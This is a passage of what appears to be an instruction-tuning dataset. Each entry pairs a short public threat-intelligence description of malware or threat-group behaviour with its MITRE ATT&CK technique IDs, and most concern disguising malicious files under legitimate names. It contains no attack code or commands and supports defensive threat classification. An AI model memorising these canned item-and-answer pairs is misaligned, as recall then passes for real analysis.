identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Goopy has impersonated the legitimate goopdate.dll, which was dropped on the target system with a legitimate GoogleUpdate.exe.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Grandoreiro has named malicious browser extensions and update files to appear legitimate.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Green Lambert has been disguised as a Growl help file.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HTTPBrowser's installer contains a malicious file named navlu.dll to decrypt and run the RAT. navlu.dll is also the name of a legitimate Symantec DLL.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If installing itself as a service fails, Elise instead writes itself as a file named svchost.exe saved in %APPDATA%\\Microsoft\\Network.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Indrik Spider used fake updates for FlashPlayer plugin and Google Chrome as initial infection vectors.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lazarus Group has renamed malicious code to disguise it as Microsoft's narrator and other legitimate files.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"LookBack has a C2 proxy tool that masquerades as \"\"GUP.exe\"\", which is software used by Notepad++.\"", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MCMD has been named Readme.txt to appear legitimate.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Machete renamed payloads to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python executables.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Machete's Machete MSI installer has masqueraded as a legitimate Adobe Acrobat Reader installer.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Metamorfo has disguised an MSI file as the Adobe Acrobat Reader Installer and has masqueraded payloads as OneDrive, WhatsApp, or Spotify, for example.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Misdat saves itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mustang Panda has used names like `adobeupdate.dat` and `PotPlayerDB.dat` to disguise PlugX, and a file named `OneDrive.exe` to load a Cobalt Strike payload.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Naikon has disguised malicious programs as Google Chrome, Adobe, and VMware executables.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OSX/Shlayer can masquerade as a Flash Player update.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"OwaAuth uses the filename owaauth.dll, which is a legitimate file that normally resides in \"\"%ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\Auth\\\"\"; the malicious file by the same name is saved in \"\"%ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\bin\\\"\".\"", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Patchwork installed its payload in the startup programs folder as \"\"Baidu Software Update.\"\" The group also adds its second stage payload to the startup programs as \u201cNet Monitor.\"\" They have also dropped QuasarRAT binaries as files named microsoft_network.exe and crome.exe.\"", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PlugX has been disguised as legitimate Adobe and PotPlayer files.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Poseidon Group tools attempt to spoof anti-virus processes as a means of self-defense.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Pysa has executed a malicious executable by naming it svchost.exe.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"QUADAGENT used the PowerShell filenames \"\"Office365DCOMCheck.ps1\"\" and \"\"SystemDiskClean.ps1\"\".\"", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "REvil can mimic the names of known executables.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Ryuk has constructed legitimate appearing installation folder paths by calling \"\"GetWindowsDirectoryW\"\" and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as \"\"C:\\Users\\Public\"\".\"", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "S-Type may save itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sandworm Team has avoided detection by naming a malicious binary explorer.exe.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Shark binaries have been named `audioddg.pdb` and `Winlangdb.pdb` in order to appear legitimate.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"ShimRatReporter spoofed itself as \"\"AlphaZawgyl_font.exe\"\", a specialized Unicode font.\"", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "StrongPity has been bundled with legitimate software installation files for disguise.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TRITON disguised itself as the legitimate Triconex Trilog application.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TeamTNT has replaced .dockerd and .dockerenv with their own scripts and cryptocurrency mining software.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The TAINTEDSCRIBE main executable has disguised itself as Microsoft\u2019s Narrator.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ThreatNeedle chooses its payload creation path from a randomly selected service name from netsvc.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TinyTurla has been deployed as `w64time.dll` to appear legitimate.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To establish persistence, SslMM identifies the Start Menu Startup directory and drops a link to its own executable disguised as an \u201cOffice Start,\u201d \u201cYahoo Talk,\u201d \u201cMSN Gaming Z0ne,\u201d or \u201cMSN Talk\u201d shortcut.", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- T1036.005: Masquerading - Match Legitimate Name or Location\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Tropic Trooper has hidden payloads in Flash directories and fake installer files.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "USBStealer mimics a legitimate Russian program called USB Disk Security.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ursnif has used strings from legitimate system files and existing folders for its file, folder, and Registry entry names.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "WIRTE has named a first stage dropper `Kaspersky Update Agent` in order to appear legitimate.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ZLib mimics the resource version information of legitimate Realtek Semiconductor, Nvidia, or Synaptics modules.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "menuPass has been seen changing malicious files to appear legitimate.", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Keydnap puts a space after a false .jpg extension so that execution actually goes through the Terminal.app program.", + "output": "- T1036.006: Masquerading - Space after Filename" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cyclops Blink has the ability to execute on device startup, using a modified RC script named S51armled.", + "output": "- T1037.004: Boot or Logon Initialization Scripts - RC Scripts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Green Lambert can add \"\"init.d\"\" and \"\"rc.d\"\" files in the \"\"/etc\"\" folder to establish persistence.\"", + "output": "- T1037.004: Boot or Logon Initialization Scripts - RC Scripts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "jRAT can list and manage startup entries.", + "output": "- T1037.005: Boot or Logon Initialization Scripts - Startup Items" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Egregor can collect any files found in the enumerated drivers before sending it to its C2 channel.", + "output": "- T1039: Data from Network Shared Drive" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MESSAGETAP uses the libpcap library to listen to all traffic and parses network protocols starting with Ethernet and IP layers. It continues parsing protocol layers including SCTP, SCCP, and TCAP and finally extracts SMS message data and routing metadata.", + "output": "- T1040: Network Sniffing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Bumblebee can send collected data in JSON format to C2.", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Caterpillar WebShell can upload files over the C2 channel.", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat 